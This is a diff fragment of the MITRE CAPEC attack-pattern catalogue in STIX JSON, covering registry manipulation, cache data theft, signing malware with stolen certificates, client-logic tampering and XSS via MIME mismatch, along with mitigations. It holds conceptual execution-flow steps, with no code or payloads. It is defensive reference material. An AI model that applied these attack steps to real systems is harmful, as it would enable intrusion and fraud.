"x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Manipulating registration information can be undertaken in advance of a path traversal attack (inserting relative path modifiers) or buffer overflow attack (enlarging a registry value beyond an application's ability to store it)." + ], + "x_capec_parent_of_refs": [ + "attack-pattern--c8c9dfbe-7a40-4041-84ff-89942878a2f4", + "attack-pattern--93bedd5b-70cc-48a0-a7c9-09b3800bd6bc", + "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b" + ], + "x_capec_prerequisites": [ + "The targeted application must rely on values stored in a registry.", + "The adversary must have a means of elevating permissions in order to access and modify registry content through either administrator privileges (e.g., credentialed access), or a remote access tool capable of editing a registry through an API." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The adversary requires privileged credentials or the development/acquiring of a tailored remote access tool." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys.", + "id": "course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-203-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc7d659b-2cb2-439c-aea4-42aea4f82adc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa", + "target_ref": "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ a robust and layered defensive posture in order to prevent unauthorized users on your system.", + "id": "course-of-action--9c745fa6-97fd-4aa7-830c-2522e1df5ea6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-203-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--999b1481-d5c3-444d-8eed-b7f921aa8bdf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c745fa6-97fd-4aa7-830c-2522e1df5ea6", + "target_ref": "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ robust identification and audit/blocking using an allowlist of applications on your system. Unnecessary applications, utilities, and configurations will have a presence in the system registry that can be leveraged by an adversary through this attack pattern.", + "id": "course-of-action--2966a770-a439-475c-8cc1-418b64736efe", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-203-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--90f1e2e6-849c-4469-b78d-75ed3dfe70e3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2966a770-a439-475c-8cc1-418b64736efe", + "target_ref": "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary examines a target application's cache, or a browser cache, for sensitive information. Many applications that communicate with remote entities or which perform intensive calculations utilize caches to improve efficiency. However, if the application computes or receives sensitive information and the cache is not appropriately protected, an attacker can browse the cache and retrieve this information. This can result in the disclosure of sensitive information.", + "external_references": [ + { + "external_id": "CAPEC-204", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/204.html" + }, + { + "external_id": "CWE-524", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/524.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "external_id": "CWE-1239", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1239.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "description": "Data from Local System", + "external_id": "T1005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1005" + } + ], + "id": "attack-pattern--c2a87533-3c81-40b3-b529-9560c644f70d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Lifting Sensitive Data Embedded in Cache", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--d17eb5a5-1361-4e13-a969-e4d587d13b3d" + ], + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify Application Cache: An adversary first identifies an application that utilizes a cache. This could either be a web application storing data in a browser cache, or an application running on a separate machine. The adversary examines the cache to determine file permissions and possible encryption.

    2. Techniques
    Use probing tools to look for application cache files on a machine.
    Use a web application and determine if any sensitive information is stored in browser cache.

Experiment

  1. Attempt to Access Cache: Once the cache has been discovered, the adversary attempts to access the cached data. This often requires previous access to a machine hosting the target application.

    2. Techniques
    Use priviledge escalation to access cache files that might have strict privileges.
    If the application cache is encrypted with weak encryption, attempt to understand the encryption technique and break the encryption.

Exploit

  1. Lift Sensitive Data from Cache: After gaining access to cached data, an adversary looks for potentially sensitive information and stores it for malicious use. This sensitive data could possibly be used in follow-up attacks related to authentication or authorization.

    2. Techniques
    Using a public computer, or gaining access to a victim's computer, examine browser cache to look for sensitive data left over from previous sessions.
", + "x_capec_prerequisites": [ + "The target application must store sensitive information in a cache.", + "The cache must be inadequately protected against attacker access." + ], + "x_capec_resources_required": [ + "The attacker must be able to reach the target application's cache. This may require prior access to the machine on which the target application runs. If the cache is encrypted, the attacker would need sufficient computational resources to crack the encryption. With strong encryption schemes, doing this could be intractable, but weaker encryption schemes could allow an attacker with sufficient resources to read the file." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-37 : Retrieve Embedded Sensitive Data. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-205", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/205.html" + } + ], + "id": "attack-pattern--1d84e8ef-4dc7-45bb-b079-09a0a6233bf9", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Lifting credential(s)/key material embedded in client distributions (thick or thin)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary extracts credentials used for code signing from a production environment and then uses these credentials to sign malicious content with the developer's key. Many developers use signing keys to sign code or hashes of code. When users or applications verify the signatures are accurate they are led to believe that the code came from the owner of the signing key and that the code has not been modified since the signature was applied. If the adversary has extracted the signing credentials then they can use those credentials to sign their own code bundles. Users or tools that verify the signatures attached to the code will likely assume the code came from the legitimate developer and install or run the code, effectively allowing the adversary to execute arbitrary code on the victim's computer. This differs from CAPEC-673, because the adversary is performing the code signing.", + "external_references": [ + { + "external_id": "CAPEC-206", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/206.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "description": "Subvert Trust Controls:Code Signing", + "external_id": "T1553.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1553/002" + }, + { + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien, W32.Stuxnet Dossier, 2010--11, Symantec", + "external_id": "REF-699", + "source_name": "reference_from_CAPEC", + "url": "https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf" + }, + { + "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 3: How software becomes compromised, 2020--03---11, Microsoft", + "external_id": "REF-700", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/security/blog/2020/03/11/guarding-against-supply-chain-attacks-part-3-how-software-becomes-compromised/" + }, + { + "description": "Operation Wilted Tulip: Exposing a cyber espionage apparatus, 2017--07, ClearSky cyber security and Trend Micro", + "external_id": "REF-714", + "source_name": "reference_from_CAPEC", + "url": "https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf" + } + ], + "id": "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Signing Malicious Code", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "\n In the famous Stuxnet malware incident, two digital certificates were compromised in order to sign malicious device drivers with legitimate credentials. The signing resulted in the malware appearing as trusted by the system it was running on, which facilitated the installation of the malware in kernel mode. This further resulted in Stuxnet remaining undetected for a significant amount of time. [REF-699]\n ", + "\n The cyber espionage group CyberKittens leveraged a stolen certificate from AI Squared that allowed them to leverage a signed executable within Operation Wilted Tulip. This ultimately allowed the executable to run as trusted on the system, allowing a Crowd Strike stager to be loaded within the system's memory. [REF-714]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The adversary first attempts to obtain a digital certificate in order to sign their malware or tools. This certificate could be stolen, created by the adversary, or acquired normally through a certificate authority.

  2. Based on the type of certificate obtained, the adversary will create a goal for their attack. This is either a broad or targeted attack. If an adversary was able to steal a certificate from a targeted organization, they could target this organization by pretending to have legitimate code signed by them. In other cases, the adversary would simply sign their malware and pose as legitimate software such that any user might trust it. This is the more broad approach

Experiment

  1. The adversary creates their malware and signs it with the obtained digital certificate. The adversary then checks if the code that they signed is valid either through downloading from the targeted source or testing locally.

Exploit

  1. Once the malware has been signed, it is then deployed to the desired location. They wait for a trusting user to run their malware, thinking that it is legitimate software. This malware could do a variety of things based on the motivation of the adversary.

", + "x_capec_prerequisites": [ + "The targeted developer must use a signing key to sign code bundles. (Note that not doing this is not a defense - it only means that the adversary does not need to steal the signing key before forging code bundles in the developer's name.)" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure digital certificates are protected and inaccessible by unauthorized uses.", + "id": "course-of-action--737363d1-53a4-4025-939a-52e2cf03ec70", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-206-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0acb6c13-3463-4a54-baf8-e5daa1cd55d0", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--737363d1-53a4-4025-939a-52e2cf03ec70", + "target_ref": "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If a digital certificate has been compromised it should be revoked and regenerated.", + "id": "course-of-action--d8bebf47-98bc-4b7d-80b3-0f326ee27bd9", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-206-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b665d54a-09fd-43ba-b66c-0b41dde234a9", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d8bebf47-98bc-4b7d-80b3-0f326ee27bd9", + "target_ref": "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Even if a piece of software has a valid and trusted digital signature, it should be assessed for any weaknesses and vulnerabilities.", + "id": "course-of-action--caf1260a-2cbc-467a-aa8a-f66f1d2107c9", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-206-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f7d911b0-644f-4efc-a169-75ba6c73e3eb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--caf1260a-2cbc-467a-aa8a-f66f1d2107c9", + "target_ref": "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary removes or disables functionality on the client that the server assumes to be present and trustworthy.", + "external_references": [ + { + "external_id": "CAPEC-207", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/207.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-75", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Greasemonkey" + }, + { + "description": "Firebug", + "external_id": "REF-76", + "source_name": "reference_from_CAPEC", + "url": "http://getfirebug.com/" + }, + { + "description": "Mozilla Firefox Add-ons", + "external_id": "REF-77", + "source_name": "reference_from_CAPEC", + "url": "https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/" + } + ], + "id": "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Removing Important Client Functionality", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Other (Information Leakage)", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The adversary reverse engineers a Java binary (by decompiling it) and identifies where license management code exists. Noticing that the license manager returns TRUE or FALSE as to whether or not the user is licensed, the adversary simply overwrites both branch targets to return TRUE, recompiles, and finally redeploys the binary.", + "The adversary uses click-through exploration of a Servlet-based website to map out its functionality, taking note of its URL-naming conventions and Servlet mappings. Using this knowledge and guessing the Servlet name of functionality they're not authorized to use, the adversary directly navigates to the privileged functionality around the authorizing single-front controller (implementing programmatic authorization checks)." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probing: The adversary probes, through brute-forcing, reverse-engineering or other similar means, the functionality on the client that server assumes to be present and trustworthy.

    2. Techniques
    The adversary probes by exploring an application's functionality and its underlying mapping to server-side components.
    The adversary reverse engineers client-side code to identify the functionality that the server relies on for the proper or secure operation.

Experiment

  1. Determine which functionality to disable or remove: The adversary tries to determine which functionality to disable or remove through reverse-engineering from the list of functionality identified in the Explore phase.

    2. Techniques
    The adversary reverse engineers the client-side code to determine which functionality to disable or remove.

Exploit

  1. Disable or remove the critical functionality from the client code: Once the functionality has been determined, the adversary disables or removes the critical functionality from the client code to perform malicious actions that the server believes are prohibited.

    2. Techniques
    The adversary disables or removes the functionality from the client-side code to perform malicious actions, such as sending of dangerous content (such as scripts) to the server.
", + "x_capec_extended_description": "\n Adversaries can, in some cases, get around logic put in place to 'guard' sensitive functionality or data. Client applications may include functionality that a server relies on for correct and secure operation. This functionality can include, but is not limited to, filters to prevent the sending of dangerous content to the server, logical functionality such as price calculations, and authentication logic to ensure that only authorized users are utilizing the client. If an adversary can disable this functionality on the client, they can perform actions that the server believes are prohibited. This can result in client behavior that violates assumptions by the server leading to a variety of possible attacks. In the above examples, this could include the sending of dangerous content (such as scripts) to the server, incorrect price calculations, or unauthorized access to server resources.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--5c201b0f-aa6f-4220-a544-1e1e7ca8ecf7", + "attack-pattern--014e5fc2-7564-4775-94aa-220601522b05" + ], + "x_capec_prerequisites": [ + "The targeted server must assume the client performs important actions to protect the server or the server functionality. For example, the server may assume the client filters outbound traffic or that the client performs all price calculations correctly. Moreover, the server must fail to detect when these assumptions are violated by a client." + ], + "x_capec_resources_required": [ + "The adversary must have access to a client and be able to modify the client behavior, often through reverse engineering. If the server is assuming specific client functionality, this usually means the server only recognizes a specific client application, rather than a broad class of client applications. Reverse engineering tools would likely be necessary." + ], + "x_capec_skills_required": { + "High": "To reverse engineer the client-side code to disable/remove the functionality on the client that the server relies on.", + "Low": "The adversary installs a web tool that allows scripts or the DOM model of web-based applications to be modified before they are executed in a browser. GreaseMonkey and Firebug are two examples of such tools." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side.", + "id": "course-of-action--5b0a3ddb-6d63-403e-8f60-bf821f6b65fe", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-207-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c5ee791d-5a7a-424b-8425-74c45b4c310e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5b0a3ddb-6d63-403e-8f60-bf821f6b65fe", + "target_ref": "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ship client-side application with integrity checks (code signing) when possible.", + "id": "course-of-action--a354ac27-1c18-44cc-bff5-3b97838a8a13", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-207-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bc683ec3-bdbd-4f4b-9388-34935ef7440e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a354ac27-1c18-44cc-bff5-3b97838a8a13", + "target_ref": "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use obfuscation and other techniques to prevent reverse engineering the client code.", + "id": "course-of-action--3ccd2b17-b570-40d7-967b-b16308019cdb", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-207-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--471fb693-94a4-42fa-a5d0-f5f7f15c36a9", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3ccd2b17-b570-40d7-967b-b16308019cdb", + "target_ref": "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker removes or modifies the logic on a client associated with monetary calculations resulting in incorrect information being sent to the server. A server may rely on a client to correctly compute monetary information. For example, a server might supply a price for an item and then rely on the client to correctly compute the total cost of a purchase given the number of items the user is buying. If the attacker can remove or modify the logic that controls these calculations, they can return incorrect values to the server. The attacker can use this to make purchases for a fraction of the legitimate cost or otherwise avoid correct billing for activities.", + "external_references": [ + { + "external_id": "CAPEC-208", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/208.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + } + ], + "id": "attack-pattern--014e5fc2-7564-4775-94aa-220601522b05", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Removing/short-circuiting 'Purse' logic: removing/mutating 'cash' decrements", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The targeted server must rely on the client to correctly perform monetary calculations and must fail to detect errors in these calculations." + ], + "x_capec_resources_required": [ + "The attacker must have access to the client for the targeted service (this step is trivial for most web-based services). The attacker must also be able to reverse engineer the client in order to locate and modify the client's purse logic. Reverse engineering tools would be necessary for this." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary creates a file with scripting content but where the specified MIME type of the file is such that scripting is not expected. The adversary tricks the victim into accessing a URL that responds with the script file. Some browsers will detect that the specified MIME type of the file does not match the actual type of its content and will automatically switch to using an interpreter for the real content type. If the browser does not invoke script filters before doing this, the adversary's script may run on the target unsanitized, possibly revealing the victim's cookies or executing arbitrary script in their browser.", + "external_references": [ + { + "external_id": "CAPEC-209", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/209.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-646", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/646.html" + }, + { + "description": "OWASP Testing Guide (v4), The Open Web Application Security Project (OWASP)", + "external_id": "REF-78", + "source_name": "reference_from_CAPEC", + "url": "http://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OWASP-DV-002)" + } + ], + "id": "attack-pattern--b27e3b46-2838-4339-a570-006474c8c402", + "modified": "2022-02-22T00:00:00.000Z", + "name": "XSS Using MIME Type Mismatch", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "For example, the MIME type text/plain may be used where the actual content is text/javascript or text/html. Since text does not contain scripting instructions, the stated MIME type would indicate that filtering is unnecessary. However, if the target application subsequently determines the file's real type and invokes the appropriate interpreter, scripted content could be invoked.", + "In another example, img tags in HTML content could reference a renderable type file instead of an expected image file. The file extension and MIME type can describe an image file, but the file content can be text/javascript or text/html resulting in script execution. If the browser assumes all references in img tags are images, and therefore do not need to be filtered for scripts, this would bypass content filters." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for stored user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all areas that allow a user to upload content through an HTTP POST request. This is typically found in blogs or forums.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to file upload features
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for MIME type mismatch: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and uploads files with scripting content, but whose MIME type is specified as a file type that cannot execute scripting content. If the application only checks the MIME type of the file, it may let the file through, causing the script to be executed by any user who accesses the file.

    2. Techniques
    Upload a script file with a MIME type of text/plain to a forum and then access the uploaded file to see if the script is executed. If possible, the script displays a unique identifier so the adversary knows for certain it was executed when testing.

  2. Store malicious XSS content: Once the adversary has determined which file upload locations are vulnerable to MIME type mismatch, they will upload a malicious script disguised as a non scripting file. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from a victim.

    3. Techniques
    Use a tool such as BeEF to store a hook into the web application. This will alert the adversary when the victim has accessed the content and will give the adversary control over the victim's browser, allowing them access to cookies, user screenshot, user clipboard, and more complex XSS attacks.

Exploit

  1. Get victim to view stored content: In order for the attack to be successful, the victim needs to view the stored malicious content on the webpage.

    2. Techniques
    Send a phishing email to the victim containing a URL that will direct them to the malicious stored content.
    Simply wait for a victim to view the content. This is viable in situations where content is posted to a popular public forum.
